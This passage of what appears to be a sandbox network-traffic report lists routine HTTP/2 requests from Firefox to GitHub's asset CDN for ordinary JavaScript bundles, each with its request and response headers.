                          date: Mon, 27 Jan 2025 17:26:21 GMT
                          age: 932135
                          x-served-by: cache-iad-kjyo7100034-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: MISS, HIT
                          x-cache-hits: 0, 16640
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: 39263ad0748418522b8b69d05743f6a1c30a8a7a
                          content-length: 6149
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-07c050c6d2d3.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-07c050c6d2d3.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Tue, 14 Jan 2025 20:30:55 GMT
                          etag: "0x8DD34DA58F99618"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:21 GMT
                          age: 932135
                          x-served-by: cache-iad-kiad7000062-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: MISS, HIT
                          x-cache-hits: 0, 16634
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: 39ac654fea27f1164faf3e7711c38ba8e78519dc
                          content-length: 3088
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/behaviors-4ff625c629d0.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/behaviors-4ff625c629d0.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Wed, 22 Jan 2025 14:23:15 GMT
                          etag: "0x8DD3AF04F2473F4"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:21 GMT
                          age: 439358
                          x-served-by: cache-iad-kiad7000094-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 48, 15050
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: d04e8ebb0c02acf5bd1c500e4f194f979a2c2bc7
                          content-length: 60195
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-f6223d90c7ba.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-f6223d90c7ba.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Tue, 19 Nov 2024 17:47:26 GMT
                          etag: "0x8DD08C23B22EDF8"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:21 GMT
                          age: 1167518
                          x-served-by: cache-iad-kiad7000141-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 31, 15043
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: da0e4bffa111ed6aec6931fbe1a77b021f62b57a
                          content-length: 4143
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/notifications-global-7556bd523830.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/notifications-global-7556bd523830.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Tue, 14 Jan 2025 20:31:16 GMT
                          etag: "0x8DD34DA65855F67"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:21 GMT
                          age: 932135
                          x-served-by: cache-iad-kiad7000155-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: MISS, HIT
                          x-cache-hits: 0, 16644
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: c31124db7b7f283703243b17caa4e31820e136de
                          content-length: 3027
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/vendors-node_modules_virtualized-list_es_index_js-node_modules_github_template-parts_lib_index_js-96453a51f920.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/vendors-node_modules_virtualized-list_es_index_js-node_modules_github_template-parts_lib_index_js-96453a51f920.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Thu, 08 Aug 2024 18:12:15 GMT
                          etag: "0x8DCB7D5A25F63A1"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:21 GMT
                          age: 1132161
                          x-served-by: cache-iad-kiad7000040-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 6884, 10207
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: 51e63fe090894dfc314901481903ebe650e70486
                          content-length: 3888
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-70450e-eecf0d50276f.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-70450e-eecf0d50276f.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Mon, 25 Nov 2024 14:39:53 GMT
                          etag: "0x8DD0D5F064BBD59"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:21 GMT
                          age: 2348197
                          x-served-by: cache-iad-kiad7000150-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 17, 8720
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: c82071a4cd7e142b1c5bb83426039554b84a2bef
                          content-length: 4975
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/app_assets_modules_github_ref-selector_ts-df71139e3900.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/app_assets_modules_github_ref-selector_ts-df71139e3900.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Tue, 14 Jan 2025 20:30:55 GMT
                          etag: "0x8DD34DA58F700EC"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:21 GMT
                          age: 932130
                          x-served-by: cache-iad-kjyo7100158-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 30, 11580
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: a1d63b5ce4bbdd12f823b3ecca6b30326b6069b8
                          content-length: 4984
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/codespaces-6b393e6a52d6.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/codespaces-6b393e6a52d6.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Tue, 14 Jan 2025 20:31:02 GMT
                          etag: "0x8DD34DA5CE41EE0"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:21 GMT
                          age: 932130
                          x-served-by: cache-iad-kcgs7200023-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 27, 9718
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: e7a64b813b12d87718281cda9803fdbdbb3e022f
                          content-length: 5491
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-3eebbd-0763620ad7bf.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-3eebbd-0763620ad7bf.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Thu, 05 Dec 2024 15:49:16 GMT
                          etag: "0x8DD15445FC3AE69"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:21 GMT
                          age: 1167517
                          x-served-by: cache-iad-kcgs7200159-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 15, 10010
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: c5735e7b7f4e49e5dd1272ef8c926711d3612a4a
                          content-length: 6126
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_decorators_js-node_modules_delegated-events_di-e161aa-9d41fb1b6c9e.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/vendors-node_modules_github_mini-throttle_dist_decorators_js-node_modules_delegated-events_di-e161aa-9d41fb1b6c9e.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Sat, 16 Nov 2024 19:35:21 GMT
                          etag: "0x8DD0675CF86BAD9"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:21 GMT
                          age: 2434820
                          x-served-by: cache-iad-kiad7000054-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: MISS, HIT
                          x-cache-hits: 0, 9637
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: 961feff487866ffd9db486c7209caa3e0e88b9da
                          content-length: 4341
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_remote--3c9c82-7238cfcdaa51.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_remote--3c9c82-7238cfcdaa51.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Thu, 05 Dec 2024 15:49:16 GMT
                          etag: "0x8DD15445FC02FE8"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:21 GMT
                          age: 2160643
                          x-served-by: cache-iad-kiad7000022-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: MISS, HIT
                          x-cache-hits: 0, 9063
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: 63e28da8f7f3f266b8d101649efd7b4a6f6d28e6
                          content-length: 3500
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/repositories-92ede33111c0.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/repositories-92ede33111c0.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Thu, 16 Jan 2025 01:08:39 GMT
                          etag: "0x8DD35CA4FC889D7"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:21 GMT
                          age: 932130
                          x-served-by: cache-iad-kjyo7100153-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 22, 10240
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: 8cb511efcaeb948dfb3fb4336c1d1bd2ab0a59cb
                          content-length: 16141
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_catalyst_lib_inde-dbbea9-26cce2010167.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_catalyst_lib_inde-dbbea9-26cce2010167.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Mon, 25 Nov 2024 15:32:27 GMT
                          etag: "0x8DD0D665E7C17D4"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:21 GMT
                          age: 2372564
                          x-served-by: cache-iad-kcgs7200094-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: MISS, HIT
                          x-cache-hits: 0, 9725
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: a3ea6481e7b02b4f9d033dbcdb1f67374179aed2
                          content-length: 2646
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/code-menu-534f8f82fbb7.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/code-menu-534f8f82fbb7.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Tue, 14 Jan 2025 20:31:02 GMT
                          etag: "0x8DD34DA5CDADA7D"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:21 GMT
                          age: 932130
                          x-served-by: cache-iad-kiad7000118-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 27, 10802
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: 6fe3cafe2e3ae154cf4381afed39e00b6f8a5362
                          content-length: 3477
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/primer-react-6bae0b4b7a9d.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/primer-react-6bae0b4b7a9d.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Mon, 13 Jan 2025 20:20:11 GMT
                          etag: "0x8DD340FAEACEFE9"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:21 GMT
                          age: 442400
                          x-served-by: cache-iad-kjyo7100130-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 4, 14668
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: d460db155870c455a2440a0c7e62cf25e7b66fd1
                          content-length: 109958
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/react-core-56498741b362.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/react-core-56498741b362.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Thu, 23 Jan 2025 14:20:20 GMT
                          etag: "0x8DD3BB911AE14CF"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:21 GMT
                          age: 354512
                          x-served-by: cache-iad-kiad7000131-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 7, 12310
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: 6e2a11dea2e8fa1de0b0230701382d3a2147fbf5
                          content-length: 41835
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/react-lib-2131e17288a8.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/react-lib-2131e17288a8.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Tue, 12 Nov 2024 00:52:38 GMT
                          etag: "0x8DD02B44DEAF90D"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:21 GMT
                          age: 1167517
                          x-served-by: cache-iad-kjyo7100051-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 21, 15684
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: 76866fe4482e3990ec616a64563599f85bb8d164
                          content-length: 54804
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/octicons-react-611691cca2f6.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/octicons-react-611691cca2f6.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Tue, 07 Jan 2025 20:44:44 GMT
                          etag: "0x8DD2F5C1DF89D77"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:21 GMT
                          age: 1167517
                          x-served-by: cache-iad-kiad7000074-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 30, 16542
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: cf3102150002b0280023a27a2b0aad657e4efe13
                          content-length: 90082
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/vendors-node_modules_tanstack_query-core_build_modern_queryClient_js-e6f07a7e80b7.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/vendors-node_modules_tanstack_query-core_build_modern_queryClient_js-e6f07a7e80b7.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Thu, 05 Dec 2024 15:49:17 GMT
                          etag: "0x8DD154460870CCD"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:21 GMT
                          age: 1167518
                          x-served-by: cache-iad-kjyo7100114-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 25, 15185
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: d560dd81f0866ab35f344349e85c7a89484ed23b
                          content-length: 7079
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/vendors-node_modules_emotion_is-prop-valid_dist_emotion-is-prop-valid_esm_js-node_modules_emo-37e3d5-92730c05e718.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/vendors-node_modules_emotion_is-prop-valid_dist_emotion-is-prop-valid_esm_js-node_modules_emo-37e3d5-92730c05e718.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
